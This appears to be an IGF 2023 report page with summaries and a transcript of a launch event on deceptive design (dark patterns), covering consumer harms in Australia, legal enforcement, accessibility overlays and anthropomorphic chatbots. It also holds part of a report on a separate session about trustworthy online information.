Deceptive designs are not limited to accessibility overlay tools but also extend to AI technologies, such as chatbots and large language models. These technologies are designed to exhibit human-like characteristics while interacting with users. However, this blurring of boundaries between humans and machines can be unsafe and misleading.

An alarming case involved a person who was influenced by a chatbot to attempt to assassinate the UK Queen. Although this is an extreme example, it demonstrates the potential dangers associated with deceptive designs in AI technologies. Additionally, the data mining practices utilized in AI can violate users’ privacy rights, further exacerbating the concerns surrounding these technologies.

Given the prevalence of deceptive designs in AI and emerging technology, there is a pressing need for regulations to address these practices. Regulators worldwide are increasingly recognizing the importance of mitigating the harmful effects of deceptive design and promoting transparency and accountability in the development and implementation of AI technologies. This regulatory intervention aims to shape discussions surrounding emerging technology and ensure that ethical considerations are taken into account.

In conclusion, deceptive design practices, whether in accessibility overlay tools or AI technologies, present significant challenges and risks. They harm individuals with disabilities, diminish their access to online platforms, and violate their privacy rights. It is imperative for companies to refrain from using accessibility overlay tools that deceive users and hinder full accessibility. Additionally, the regulation of AI and emerging technology is crucial to address deceptive design practices and ensure a safe, inclusive, and transparent digital environment for all.

Chandni Gupta

The research conducted on dark patterns has revealed a concerning trend of deceptive designs being used by businesses across various sectors on websites and apps. This is a cause for concern as these dark patterns are designed to manipulate and deceive users, often leading them to make unintended decisions or take inappropriate actions. Chandni’s research has shown that many dark patterns that exist today aren’t necessarily illegal, which raises questions about the ethics behind their use.

Furthermore, data from Australia highlights the negative consequences experienced by consumers as a result of encountering dark patterns. Research revealed that 83% of Australians have experienced one or more negative consequences due to dark patterns. These consequences include compromised emotional well-being, financial loss, and a loss of control over personal information. The impact of dark patterns on consumers’ lives and their trust in businesses should not be underestimated.

One argument that emerges from the research is that businesses need to take responsibility for their actions and change their behavior towards dark patterns. The prevalence of these manipulative designs can harm consumer trust and loyalty in the long run. It is disheartening that businesses aren’t being held accountable for these practices, leading to a sense of frustration among consumers. However, some businesses have the ability to make changes today and set an example for others to follow.

Additionally, it is recognized that everyone in the digital ecosystem has a role to play in combating dark patterns. Governments, regulators, businesses, and UX designers all have a responsibility to address this issue. By working together, it is possible to create a fair, safe, and inclusive digital economy for consumers. UX designers, in particular, can share research resources with their colleagues to demonstrate the impact that better online patterns can actually have.

In conclusion, the research on dark patterns highlights the concerning prevalence of deceptive designs on websites and apps. Consumers in Australia have reported significant harm resulting from encountering dark patterns. It is crucial for businesses to take responsibility for their actions and change their behavior towards these manipulative practices. Additionally, a collective effort from all stakeholders in the digital ecosystem is needed to combat dark patterns and create a more trustworthy and inclusive online environment for consumers.

Session transcript

Titiksha Vashist:
. . . on this. Plainly put, dark patterns are often carefully designed to alter decision-making by users or trick users into actions they did not intend to take. Now, deceptive design is something we’ve all encountered on the web, right? They have found their way into a plethora of online experiences, from e-commerce apps to social media, from fintech services to education and so forth. Now these design choices, which may seem very innocent and innocuous on the outside, have multi-sided harms actually baked into them. And by tricking, manipulating, misdirecting or hiding information from users, these patterns harm not just the single end user of the internet, but also digital ecosystems at large. And those are also findings which resulted from the work that we did on this issue. This project, called Design Beyond Deception, sought to understand the harmful impacts of deceptive design specifically in understudied contexts, because a lot of the academic work so far on deceptive design was limited to the United States and the European Union, and we wanted to look at what it looks like in other countries, right? Where the nature of digitalization itself is different. We also wanted to see how we can replace such design practices with practices that embody values, right? And these are values that consumers, companies, civil society and governments want reflected online, right? And that’s precisely why our project also had a very strong practice or application component and not just a theoretical one. Now, moving on to what are the harms caused by these deceptive design patterns: there are two ways in which we categorize these harms. One is personal consumer detriment, which is focused on harms which you and I as people can identify we have undergone. These include privacy harms and financial loss; a lot of financial loss has been documented in countries such as India. 
Psychological detriment, and time and resource loss, also occur. But at the same time, if we look deeply into the problem of deceptive design, we realize that there are also structural consumer detriments as well as harms to the larger digital economy, including loss of trust. A lot of research showed that when websites and apps used forced registration or price-comparison prevention and so on, it weakens or distorts competition in a digital market. What that essentially means is that because of the use of these deceptive patterns, there is unfair trade practice being done in the digital economy. And this currently does not find any anchoring in our laws, but that’s precisely why this topic has to be discussed at a platform such as this. Next, I want to talk about why we are discussing deceptive design, which seems like a more designer-centered issue, at the UN IGF. And the simple reason is we are increasingly seeing regulators worldwide investigating deceptive practices in their specific contexts. These include the Federal Trade Commission in the United States. It includes the European Commission and BEUC, which have been looking at this issue for a while and trying to understand how it can create stronger European consumer protection law. And it also finds mention in the DSA. And consumer councils in countries such as the Netherlands, Norway, Australia, and very recently, India, have also issued guidelines and working papers and have been trying to push policy on deceptive design. Finally, data protection authorities have been at the forefront in several jurisdictions in talking about the privacy and data harms which result from deceptive practices. Now, regulators are investigating the consumer harms, privacy and data harms, and competition harms which result from these patterns. And this is precisely where I want to move into a little bit about what our project was about. 
So the Design Beyond Deception project was an 18-month-long project which sought to bridge the gap between the theory and practice. We held more than four large group-focused consultations, engaged with over 50 global experts in various domains, and held 20-plus in-depth interviews on this issue. We also issued a research series, which is also being launched today, by authors from across the world who focused on understudied areas. And this research was very generously supported by the University of Notre Dame and IBM’s Tech Ethics Lab in the United States. Now very quickly, going over the project process, we started out with, of course, a review of academic literature, given the multidisciplinary and cross-sectional nature of the issue itself. Second, to tap into the in-depth expertise from multiple stakeholders placed across fields of theory and practice, we did scoping interviews with experts, which helped us give shape to the rest of the project. Third, we thought that creating a new body of work which contextualizes deceptive design specifically will help deepen the conversation significantly on the issue. And that led to focus groups and workshops with stakeholders, which led us to our final goal, which is the creation of a manual for design practitioners who otherwise would not have, as a part of their curriculum or training as designers, an understanding of deceptive practices and how it may harm their end users. So the stakeholders we engaged with for this particular project were academics and researchers, design practitioners, start-ups, civil society and policy folk, and of course, industry, which included a whole bunch of people from top to bottom who are involved in different decision-making processes, which very… very much so impact, you know, design decisions in a company. While our manual themes span what is deceptive design for a designer and not for a researcher, we also look at rethinking the user, designing with values, design for privacy. 
We touch upon culturally responsible design and finally look at how regulation meets design, wherein we also probe the design practitioner to look at designing our collective future from a different standpoint. And since this manual has been made for practitioners, it is full of frameworks, activities, and teamwork, things that perhaps a product team can sit together and do on their own, right? Very quickly, talking about the research series, which also we are launching today, it focused essentially on understudied areas and understudied harms, including how, for example, crafting a definition for deceptive design is harder than it may seem. And for those of you who are lawyers in this room, you would completely understand why this is a huge challenge. We also talk about how identifying anti-competitive harms in deceptive design discourse is crucial. Also, how deceptive design plays in voice interfaces and further such research pieces, which were contributed from people across the world. So without further ado, I would request you to explore this project online or pick up a copy of the manual and research series here from the table in the first row for you to peruse. And without taking much of the time, I would very quickly now want to invite the speakers who have graciously joined us online. We have two speakers, Chandini Gupta and Maitreya Shah, who have joined us online, and I hope they can hear me. We also have videos from two speakers who, because of time zone issues, could not join us online, but have been very generous. So, to quickly introduce the speakers, Chandini is currently the Deputy CEO and Digital Policy Director at the Consumer Policy Research Centre, which is Australia’s only dedicated consumer policy think tank. She has previously worked at the Australian Competition and Consumer Commission, the OECD and the United Nations. 
She has over 15 years of experience in consumer policy, domestically as well as internationally, and her research focuses on exploring the consumer shift from the analogue towards the digital economy. Her work was extremely crucial in the sense that – I’m sorry, just – yeah, it was the first study in Australia which essentially led to policy change and consumer action on deceptive design. Maitreya Shah, who is also joining us online today, is a blind lawyer and researcher. His work lies at the intersection of ethics and governance of emerging technologies and disability rights. He was most recently at Regulatory Genome, a spin-out of the University of Cambridge, and was previously a LAMP (Legislative Assistants to Members of Parliament) Fellow in India. He has extensively worked in areas of digital accessibility, AI governance, regulatory technologies and disability law. Currently, he is a fellow at the Berkman Klein Center for Internet and Society at Harvard University, where he will be examining AI fairness frameworks from the standpoint of disability justice. We also have two recordings, from Caroline Sinders and Professor Cristiana Santos. Caroline Sinders is an award-winning critical designer, researcher and artist. They are the founder of a human rights and design lab called Convocation Research Plus Design, and she is also currently at the Information Commissioner’s Office, which is the UK’s data protection and privacy regulator. Finally, Professor Cristiana Santos is an assistant professor in privacy and data protection law at Utrecht University in the Netherlands. She is also an expert of the Data Protection Unit of the Council of Europe and an expert for the implementation of the EDPB support pool of experts, amongst her many varied accomplishments. Without further ado, I would request Dhaneshree to play the video by Caroline Sinders, who will touch upon deceptive design from a design practitioner’s standpoint.

Caroline Sinders:
I’m a researcher and postdoctoral fellow with the Information Commissioner’s Office in the United Kingdom; that’s the data protection and privacy regulator. I also run a human rights lab called Convocation Research and Design. I really wish I could be there in person. I’m so sorry I can’t be, so I’ve made this recording instead. Thank you so much to the Pranava Institute for inviting me to be on this panel. I’m one of the contributors to their recent toolkit that’s out on deceptive design patterns, and I’m excited to present to you today and talk a little bit about why design and interdisciplinary thinking is so important when it comes to creating regulation, investigations, and other ways to help curb and mitigate the harms of deceptive design patterns. I’ve also created a very small presentation that I’m excited to show to all of you. Harmful design patterns are everywhere. They’re very prolific in the modern web and they’re universally found. I have not, in all of my extensive research, ever come across a country or region that does not have harmful design patterns. They are in fact a global phenomenon, and a global menace is the way to think about it. My article for the Pranava Institute’s toolkit focuses on what we do with emergent spaces, let’s say like the metaverse or IoT or voice activation, where design patterns are not standardized yet for users, meaning users have not engaged with voice activation enough to understand what all of the design patterns are within that space. Or in the case of something like the metaverse, where there’s not a lot of people using it and it’s a really emergent space, what are the healthy design patterns within that? We haven’t really come to that space yet. A lot of current design patterns exist because we’ve lived in this kind of flattened modern web for quite a few years, and so there have been many years of research to figure out what healthy or trustworthy or pro-user design could look like. 
And it’s that subversion where harmful design patterns exist. This kind of research is so important because it will impact how users create safety. It will impact forms of regulation. And this kind of work does really require an interdisciplinary lens. So what does policy need to help combat harmful design patterns? Again, it’s this understanding that design is an expertise and, as I was saying earlier, an integral part of the web. What we need is to broaden our idea of what, let’s say, a researcher looks like or what knowledge looks like. One of the things that’s been exciting in the many years that I’ve been researching harmful design patterns is the ability to work with all different kinds of legal experts who recognize that design is an expertise. What this means, when we’re investigating things like harmful design patterns, is actually having a knowledge of what design patterns are, what different kinds of standardized design patterns exist, and how to run different kinds of evaluations, like a heuristic evaluation or a usability evaluation or an accessibility evaluation. There are many different ways to do them, but there are agreed-upon tests, in a way, or a series of different kinds of tests people can conduct. And these are the ways in which you can look at, let’s say, the health of a product, or how well or not well that product is designed. Often when investigating harmful design patterns, what you need to find or surface is: where does the confusion or manipulation or exploitation lie? So where is the harmful design pattern actually subverting the expected design pattern? The expected design pattern is the one the user thinks they’re engaging with, right? Because that’s what’s being subverted, intentionally or unintentionally. And this is where having a background in UX design is really, really important to be able to recognize that. 
A paper by the European Data Protection Board, testing with a few thousand users, actually found that those who were less susceptible to harmful design patterns were the ones who had heard of UX design or knew what UX design was. Right? And this is really important to highlight. It means we’re creating an unequal and inequitable web if the only way for people to avoid harmful design patterns is to have a design background. So, conversely, I think to help investigate more, this kind of interdisciplinary knowledge is needed: understanding how products are made, how they’re tested, and being able to do different kinds of analysis, let’s say, on the interface itself. Inconsistent design, which we see a lot in different kinds of harmful design patterns, can confuse users. It can overwhelm them, say if there are too many features or too many choices. Misunderstanding a core audience can also lead to poor or unhelpful design decisions. But we’ll see this in the example I’m going to show. So inconsistent design can be a product name changing, choices not being illustrated the same way, or a name that doesn’t match up with what the user thinks they’re doing. All of these things can confuse users. This also means that sometimes, if you’re calling something by a name that’s too technical, a user might not understand what it is. Thank you so much for having me here. I’m so sorry that this is a short talk. But one thing I wanted to really emphasize, again, is that design can be an equalizing action that distills code and policy into understandable interfaces. What we need is more research: more collaborative and interdisciplinary research between policymakers, regulators, policy analysts, and designers.

Titiksha Vashist:
Thanks, Caroline. And now, moving on to Chandni, who’s joined us online. I would request Dhaneshree to put up the slides. And over to you, Chandni. Welcome, and thank you for being here. Thank you so much. I just want to confirm that you can hear me and you can see my slides? Yes. All good.

Chandni Gupta:
Excellent. So thank you so much for the introduction earlier, and thank you so much for having me. Before I begin, I do have to say congratulations to the Pranava Institute, who have created such a practical tool, which I’m sure, and I hope, will become a valuable resource for the UX community from here on. I’m delighted to share with you today some of the insights from our research. One of the things that we at the Consumer Policy Research Centre do is look at what evidence-based research can bring about systemic change, and this was one of the projects we have been working on for a number of months now. It was about 18 months ago that we started our journey into looking at deceptive and manipulative designs. As part of our research, what we really wanted to understand were two things: what are the common deceptive patterns that Australians come across most frequently, and what’s the impact on consumers? We heard Caroline say how important it is to be able to understand that impact, and what we really wanted to do was quantify that harm. Dark patterns today are so prominent across the websites and apps we use every day. They’re used to influence our decisions, our choices, our experiences. Is it in our best interest? Often not. Is it illegal? Largely not. So in case you’re wondering where dark patterns exist, as Caroline said as well, they are so prominent, they are everywhere. Even as part of our research, we asked a nationally representative sample of 2,000 Australians in our survey to list the names of businesses they could recall using deceptive designs, and businesses from almost 50 different sectors were identified. I mentioned before that many of the dark patterns that exist today aren’t illegal. Currently in Australia, we can look through the lens of misleading and deceptive conduct, unfair contract terms or the Privacy Act, but the law currently offers a very narrow lens for how regulators can act. But are consumers experiencing harm? 
Well, the short answer is yes. Research revealed that 83% of Australians had experienced one or more negative consequences as a result of dark patterns being used on websites and apps. Yet eight out of the ten dark patterns we looked at could be implemented here in Australia without any consequence to businesses. Consumers in our survey reported their emotional well-being being compromised, experiencing financial loss and feeling a real loss of control over their personal information. And it was anything from feeling pressured into sharing more data than they needed to, to accidentally making a purchase. In fact, in the qualitative part of our research, the frustration really came through, and it came down to three elements. One, there’s a lack of meaningful choice. Sometimes accepting the preferred business choice is the only way to access a product or service. For example, in our study, we saw an example of a fitness centre that didn’t let you see its timetable until you created a profile on its app. Two, it’s the pervasive amount of pressure that’s put on consumers, especially once their personal details have been shared and suddenly they’re prone to hyper-personalized content or continuous direct mail. And three, finally, there’s a sense of frustration that businesses aren’t being held accountable for any of these practices. When it comes to younger consumers, the impact only compounded. Consumers aged between 18 and 28 were more likely to experience both financial and data harms. For example, one in three spent more than they intended, and that was 65% above the national average. This demographic in Australia often has less disposable income, so the impact of harms is likely to be felt more as well. On the flip side, there’s also a cost for businesses. Almost one in three of the consumers we surveyed stopped using the website altogether. 
Almost one in six felt their trust in the organization had been undermined, and more than one in four thought negatively about the organization. So while in the short term dark patterns may lead to financial and data gains, in the long run they will deteriorate consumer trust and loyalty. So what our research has highlighted is that everyone in the digital ecosystem has a role to play, and Titiksha mentioned this earlier as well. There’s definitely a role for governments and regulators, and we’ve been really pleased to see some of the changes that are coming about, such as the government here currently considering introducing an unfair trading prohibition, with dark patterns being included as part of that legislation, and the Privacy Act finally getting reviewed; it currently dates from the 1980s, so it not only predates dark patterns, it predates the internet. However, it’s actually businesses who are in the best position right now to make changes today and lead by example, whether it’s auditing their online presence or testing with consumers’ best interests in mind. Even small businesses can be really mindful about the off-the-shelf e-commerce products they’re choosing and which features they’re turning on and off. Now, from what I’ve heard from UX designers who have reached out to me during conferences and events, it’s often not in their hands, and much of this is a business decision that happens in another part of the company. But one of the things they can do is share this type of research and resources, such as the Pranava handbook and other work that’s happening in this space, with their colleagues, to show the impact better online patterns can actually have, not only on consumers but also on their business. I’ll end by saying we’ve actually all got a role to play in ensuring a fair, safe and inclusive digital economy for consumers. Thank you so much.

Titiksha Vashist:
Thank you so much, Chandni, for that presentation. And I would very much like to point out that Chandni’s research, and the research done at her institute, in fact very recently helped push the case for making unsubscribing easier on e-commerce platforms like Amazon, and that’s a big move, right, coming from regulators. So more power to you, and thank you so much for joining us today. I would now like to request Dhaneshree to play a recorded video we have from Professor Cristiana Santos, who will talk about deceptive design from a legal standpoint and share some of her work.

Cristiana Santos:
For the first time in a decision, we suggest that, along with this DPA, other enforcers name and publicize violations as dark patterns in their decisions. This way, we believe that organizations can factor the risk of sanctions into their business calculations, and also policy makers can be aware of the true extent of these practices, right? And naming dark patterns is now more important than ever, especially since the DSA and the DMA codify dark patterns explicitly. So it’s a legal term. We also found that dark patterns are used by big tech, but also by small and public organizations. Most decisions refer to the user interface, or to the user experience or user journey, and to information-based practices. Finally, we understood that harms caused by dark patterns are not yet assessed in decisions. Let’s have a look at the privacy-related dark patterns we found in these decisions. In this table, you can see the data protection cases according to the practices related to dark pattern types. The majority of dark patterns referred to are obstruction practices, related to the difficulty of refusal and withdrawal of consent: more than 30 decisions. These are followed by forced practices, so when users withdraw consent but unnecessary trackers are loaded, or trackers are stored before consent is asked: more than 25 decisions. Finally, policy to use a service at the same time and in both, for example. So we understand that enforcement cases are a way for a general deterrence of dark patterns. And we showcase these dark pattern decisions on this website, deceptivedesign.org, and this website is being updated daily with new decisions. So, let’s talk about the harms caused by dark patterns. There is a growing body of evidence from human-computer interaction studies and from computer science studies referring to dark patterns that actually might elicit or lead to potential or actual harm. 
But there are also harms related to dark patterns in privacy, and several studies focused on consent interactions show several harms caused by dark patterns: labor and cognitive harms, loss of control, privacy concerns and fatigue, negative emotional responses, and regretting privacy choices. All of these provide evidence of the severity of harms. For a concrete example, scholarly works find that pre-selected purposes, pre-selected options for processing data, or even an ‘accept all purposes’ option at the first layer of a consent banner can or may use users’ personal data, or even very sensitive data depending on the website in question, and can share this personal data by default with hundreds of third-party advertisers. And this might provide evidence of the potential severity and impact of dark pattern harms. However, consent claims, at least the ones scoped here, for non-material damages are not being used within the redress system, even though there are so many decisions related to dark patterns and related to violations of consent interactions. Finally, we know that dark patterns occur in different domains, not only in privacy, right? And there are several data protection regulators and policy makers that show interest in contributing to this space of dark patterns. We find at least five reports from EU, UK and US bodies published in 2022 alone. But these sources often lack citation provenance trails for typologies and definitions, making it difficult to trace where new specific types of dark patterns emerge and under which conditions. On the other hand, academic literature has grown rapidly since Brignull released his original typology in 2010. In the years since, foundational work by Bösch, Gray, Mathur, Luguri, and Strahilevitz has added many new dark patterns. These typologies have had some overlaps and also some misalignments. We analysed those academic and regulatory taxonomies and counted 245 dark patterns. 
Many of these dark patterns indeed either overlap with or misalign with other types of dark patterns coming from all these different sources. And so we constructed an ontology of dark patterns knowledge. We aggregated existing patterns, identified their provenance through direct citations and inferences, and clustered similar patterns, creating high-level, middle-level and low-level patterns. This ontology of dark patterns enables a shared vocabulary for regulators and dark pattern scholars, enabling more alignment in user studies, in mapping to decisions, and in discussions of harms, and helping scholars to trace the presence and types of dark patterns over time. Regulators could anticipate the presence of existing patterns in new contexts or domains and guide detection efforts. Thank you for your time, and if you have any question or any suggestion, please consider sending me an email. Thank you so much.

Titiksha Vashist:
Thank you to Professor Santos for that presentation, and for showing us very clearly how deceptive designs are now increasingly a part of the legal discourse, as different countries across the world look at them more closely and make them a part of their case law. I would now finally like to invite Maitreya Shah to share his comments with us. Thank you so much, Maitreya, for your patience and thank you so much for being with us. Hi Titiksha, thank you so much for having me

Maitreya Shah:
here. I hope you can see my presentation. Yes, Maitreya, you’re all set. Thank you so much and congratulations for launching this at one of the best platforms possible in the world to talk about this. So yeah, hello everyone. I’m Maitreya Shah and thank you so much Detectioner and Pranava for that generous introduction. So my fellow speakers have already touched upon many forms of deceptive designs and how they interact with consumers, how they pose harm to people and what are the dark patterns that exist on the internet and elsewhere today. You know, dark patterns, deceptive designs are quite multidisciplinary with the rise of AI and emerging technologies. I intend to talk about two things very briefly. The first is the piece that I wrote for the research series that Panava is launching today, which deals with accessibility overlays and their harms on people with disabilities. The other is briefly to my work because a lot of my work is on AI bias, fairness, and ethics. I tend to briefly touch upon the deceptive design dark patterns that are emerging through AI and emerging technologies and the new models that we see in the world today. To start with, deceptive design practices in accessibility overlay tools. I wrote an analytical piece for the ethical design research series of Panava. I evaluated what are called accessibility overlay tools. Before I delve into what accessibility overlay tools are and what deceptive design practices are, I’ll give you a brief on accessibility. Accessibility is the idea to make websites and applications usable for people with disabilities. It is a legal right and a legal obligation to various instruments international and domestic. I’ve given here a few examples. These accessibility overlay tools are basically designed to subvert the legal obligations to make websites accessible. 
I have tried to analyze these tools through a deceptive design lens, to call out the dark patterns and show how they end up harming people with disabilities on the Internet. A generic overlay, as a lot of you who come from the design side of things know, usually sits on the UI or UX side of websites or web applications. It takes the form of pop-ups or JavaScript boxes that tend to deviate or obstruct the attention of users on websites and shift their focus to something different, like sign-up boxes or advertisements and so on. An accessibility overlay tool is exactly like this. However, what it claims to do is make the website accessible for people with disabilities. Now, in line with a lot of international standards and regulations, the World Wide Web Consortium has come out with the Web Content Accessibility Guidelines, standards that guide developers and designers in making websites accessible. These standards require a lot of manual labor and a lot of manual design input, right from the source code. But these accessibility overlay tools do not end up making any changes in the source code. They only make changes on the user interface side. They basically just change the font, color, contrast, or size, or maybe add some image descriptions on the website, which are things that are already built into the assistive technology of people with disabilities. So accessibility overlay tools are not doing anything new. Assistive technology like the screen readers that blind people, for example, use already has a lot of these features built in. So what are the harms? The companies that sell these accessibility overlay tools claim that they are making the website accessible. What ends up happening is that whenever there is an accessibility overlay tool on a website, there is a toolbar and an announcement at the top of the website, 
on its landing page, that says the website is accessible and that visitors can utilize this feature to get an accessible experience and interaction on the website. So people with disabilities, their trust gets kindled. They tend to use the website with the anticipation that it will be accessible, and what ends up happening is that they are deceived and manipulated into choices that they do not intend to make, which is inherently the idea of deceptive design. This is done, as I said earlier, to subvert the legal obligation to make websites accessible. Companies employ designers who don’t incorporate accessibility features from the very inception of the website-building process, and then they are afraid of lawsuits and paying hefty compensation. So they resort to these sorts of contrivances and shortcuts to make their websites appear accessible. There are many issues that end up affecting people with disabilities when these overlay tools are deployed on a website or a web interface, and I’ll mention them before I come to the strategies for countering these tools. Firstly, many screen readers, which blind people especially use, get obstructed by these overlay tools. These overlay tools also tend to infringe on the privacy of people with disabilities, because they detect assistive technology. And there are many other issues, like false and inaccurate image descriptions that might mislead or manipulate people into purchasing things that they do not want. In line with the idea of today’s discussion, I have given here a few points around strategies that would move us from theory to practice. How do we counter these accessibility overlay tools? How do we see to it that companies don’t use these tools and that they don’t harm people with disabilities? 
These are a few examples that I have personally researched and gathered from across the globe that are somewhat effective strategies to counter the deceptive practices of these tools, including regulatory actions, community advocacy, tools that could counter these accessibility overlays, and educating and sensitizing designers and web developers, to start with. This was possible through the collaboration and consultation that I could have with Pranava, to think about how these accessibility issues could be manifest in deceptive design language and how they harm people with disabilities, and to understand this issue, which is quite marginalized and very little talked about. I’ll quickly move to artificial intelligence technologies. There is a lot of hype and a lot of discussion around ChatGPT and similar tools today. We interact with chatbots and with these new forms of large language model technologies. So these are the kinds of issues that one faces. In my presentation I have two broad issues that I wanted to focus on, two examples that I wanted to share with you that have come up in my research so far. And I’ll be very brief, because I’m mindful of the lack of time. So a lot of regulators are talking about, and making people aware of, the deceptive design practices relating to anthropomorphism, which is basically human characteristics being carried by non-human identities. For example, chatbots and generative AI models that take on human characteristics blur the boundaries between humans and tech, and they tend to manipulate users and subvert users’ autonomy and privacy. In the previous slide, I’d given an example where a person back in 2021 was influenced by a chatbot and attempted to assassinate the Queen of the United Kingdom. So these are the kinds of issues that one could face because of chatbots and large language models. I’m so sorry to interrupt you. 
Could you just very quickly wrap up? We’re one minute over time. And I would just say, yeah, thank you. Thank you. This is, very briefly again, an example of data mining practices and how they can violate the privacy of users. I’ll quickly move on. These are a few examples, again, of moving from theory to practice: how regulators are trying to shape the discussion around AI, emerging tech, and deceptive design practices, and how you or I, as lawyers, designers, or community advocates, can influence the work on this. Yeah, that’s it. Thank you so much. I’m sorry for running over time.

Titiksha Vashist:
Thank you so much for joining us, Maitreya, and for sharing your specific research at the intersection of deceptive design and disability. I wish you all the best for your forthcoming work on AI and deceptive design. That being said, in the interest of time, let me thank everyone for joining us for this launch event. You can see the QR code for our project right up here on the screen, and if you’d like to grab a physical copy of the manual or the research series, they’re right here on the front desk. Again, I would like to extend my gratitude to both Chandni and Maitreya, who joined us at very, very odd times. Thank you for making it to this event, and thank you to everyone for attending this session. We are definitely available offline if you are interested in this issue and want to talk more about it. Thank you.

Caroline Sinders
Speech speed: 188 words per minute | Speech length: 1099 words | Speech time: 352 secs

Chandni Gupta
Speech speed: 160 words per minute | Speech length: 1076 words | Speech time: 403 secs

Cristiana Santos
Speech speed: 128 words per minute | Speech length: 859 words | Speech time: 401 secs

Maitreya Shah
Speech speed: 143 words per minute | Speech length: 1536 words | Speech time: 643 secs

Titiksha Vashist
Speech speed: 127 words per minute | Speech length: 2361 words | Speech time: 1119 secs

(Re)-Building Trust Online: A Call to Action | IGF 2023 Launch / Award Event #144



Full session report

Audience

The analysis explored various topics related to the global information ecosystem and its challenges. One key concern highlighted was the negative impact of disinformation, which extends beyond a Western-centric approach. The speakers emphasized the need to consider the effects of disinformation in different languages, as it can affect people’s offline lives. It was recognized that addressing disinformation globally is crucial, rather than focusing on specific regions.

The work of Wikimedia and Global Voices in creating a trustworthy global information ecosystem was appreciated. These organizations were praised for their contributions, involving individuals from different parts of the world. Collaboration and a multi-stakeholder approach were deemed essential in building a reliable information ecosystem.

A speaker, Nick Beniquista, argued for major system-level interventions to address the challenges faced by the information ecosystem. Initiatives such as Pluralis in Europe, trust initiatives for quality online information, and policy interventions like bargaining codes were mentioned. This indicates the need for a comprehensive approach and the involvement of various stakeholders to tackle the complex issues within the information ecosystem.

However, some concerns were raised about the proposed principles discussed during the analysis. These principles were deemed somewhat understated in dealing with the complexity of the challenges. Although they may be widely accepted, there are doubts about their sufficiency in addressing the depth and breadth of the issues. Therefore, comprehensive strategies and solutions are needed.

Furthermore, questions were raised about the effectiveness of a participatory, citizen-driven approach in addressing the systemic challenges of the information ecosystem. One speaker described this approach as “quaint,” suggesting doubts about its effectiveness given the scale of the challenges. This highlights the need to consider alternative strategies alongside participatory approaches.

Regulation and the differentiation between large and small online platforms were emphasized as crucial factors in addressing the challenges of the information ecosystem. It was argued that large platforms bear a special responsibility for content management and accessibility. Efforts by the Danish government and the European Union (EU) were highlighted, including partnerships with organizations like Access Now and the development of regulations that consider different local contexts outside the EU. This underscores the importance of globally applicable regulatory frameworks that also respect regional variations.

The analysis also mentioned concerns about the operationalization of the discussed principles and the potential consequences of the proposed internet safety bill in Sri Lanka. The bill, which has passed its first reading in parliament, raised concerns about censorship and the potential fragmentation of the internet. An audience member expressed opposition to the bill and sought help in collective action, emphasizing the need for collaboration and partnerships in addressing internet governance and legislation.

In summary, the analysis delved into various aspects of the global information ecosystem and its challenges. It highlighted the negative impacts of disinformation, the significance of a trustworthy information ecosystem, the need for major system-level interventions, as well as concerns about certain approaches and proposed bills. Collaborative efforts and collective action are crucial in establishing a reliable and inclusive global information ecosystem.

Moderator

The session focused on the work of a task force dedicated to promoting trustworthy information online, as well as the launch of a set of principles by this task force. The task force is a newly established multi-stakeholder entity within the Freedom Online Coalition. Its main goal is to offer policy recommendations to government institutions and lawmakers to ensure a healthy and reliable online information ecosystem.

The United States is actively promoting trustworthy information online and is committed to addressing the global issue of disinformation. They are implementing initiatives such as fact-checking and media literacy programs to combat the spread of false information. Efforts are also being made to protect and promote open and resilient information ecosystems and support the long-term sustainability of independent media outlets.

While promoting trustworthy information online, the US government emphasizes the importance of not undermining fundamental democratic freedoms. They caution against using regulatory measures to suppress peaceful dissent and silence independent media, civil society activists, human rights defenders, and marginalized groups.

The session also highlighted the importance of platforms like the Freedom Online Coalition and the Internet Governance Forum (IGF) in countering disinformation and addressing global threats. These platforms are crucial spaces for bringing together stakeholders to tackle the challenges posed by the spread of misinformation and to ensure a secure and open internet.

One significant issue discussed during the session was the consolidation of power over online speech, which negatively impacts platforms advocating for freedom of expression. The session also addressed the exclusion of participation, which can lead to the spread of misinformation. It was noted that depriving half the world’s population of involvement in knowledge spaces contributes to the spread of false information, particularly in the age of generative artificial intelligence.

The session stressed the importance of diversity in media and information, acknowledging that news framing bias is a pervasive problem, and that news organizations alone are insufficient for meeting the need for diverse and reliable information. It was also emphasized that building reliable information structures requires the involvement of civil society and the private sector through partnerships.

Governments were encouraged to play an active role in regulating the online space to promote engagement, free debates, and protect human rights. Striking a balance between regulation and trustworthiness is crucial in ensuring the effectiveness and fairness of online platforms.

The session also addressed the need for educating policy-makers and governments about platforms like Wikipedia and how they operate. This knowledge is important for understanding the value and significance of protecting and promoting such platforms.

The launch of the task force and its principles were seen as an opportunity to pave a strategic path forward and to coordinate with other international initiatives. Participants expressed the need for dialogue and engagement with stakeholders, as well as with counterparts in the ecosystem, to ensure well-informed policies and effective regulations.

The session ended with participants being encouraged to learn more about the task force and get involved. The importance of their role in contributing to the development and implementation of strategies to address the challenges related to trustworthy information online was highlighted.

In conclusion, the session covered various aspects related to the task force’s work on promoting trustworthy information online. It underlined the importance of balancing regulation and trustworthiness, the need for diversity in media and information, and the significance of multi-stakeholder engagement to address global threats and challenges. The session also highlighted the ongoing efforts by the United States and other countries to counter disinformation and promote reliable information online. Overall, the discussion emphasized the key role of collaboration between different stakeholders in building a more trustworthy and inclusive online information ecosystem.

Klara Therese Christensen

This analysis provides a detailed exploration of key points surrounding the role of the internet in relation to marginalized voices, information distortion, and the need for reliable information structures. One argument put forth is that while the internet presents opportunities for marginalized voices to be heard, it also brings about the potential for distortion and muddled reliability of information. This highlights the challenge of navigating and discerning credible information in the digital age.

Partnerships with civil society and the private sector are emphasized as vital in building reliable information structures. By collaborating with these sectors, it is believed that information can be better managed and disseminated. These partnerships can contribute to the development of robust platforms and frameworks that promote the availability and accessibility of accurate information.

Governments are seen as having a responsibility to create human rights-based ecosystems of information. This implies that governments should prioritize the protection of individuals’ rights to access and share reliable information. By ensuring the existence of a conducive environment for the free flow of information, governments can help to counteract the negative effects of misinformation and disinformation.

The analysis also discusses the need for sound regulation in managing online spaces. While it is recognized that regulation is necessary to curb harmful content and maintain order, it is crucial to strike a balance with the preservation of freedom of debate and active engagement. Finding this equilibrium ensures that online spaces remain open and democratic while effectively managing potentially harmful content.

Furthermore, community engagement is considered pivotal in determining and implementing appropriate regulatory measures. By involving and empowering communities, there is a higher likelihood of generating regulations that reflect the needs and perspectives of those affected by them. This participatory approach can foster more effective and inclusive governance of the internet.

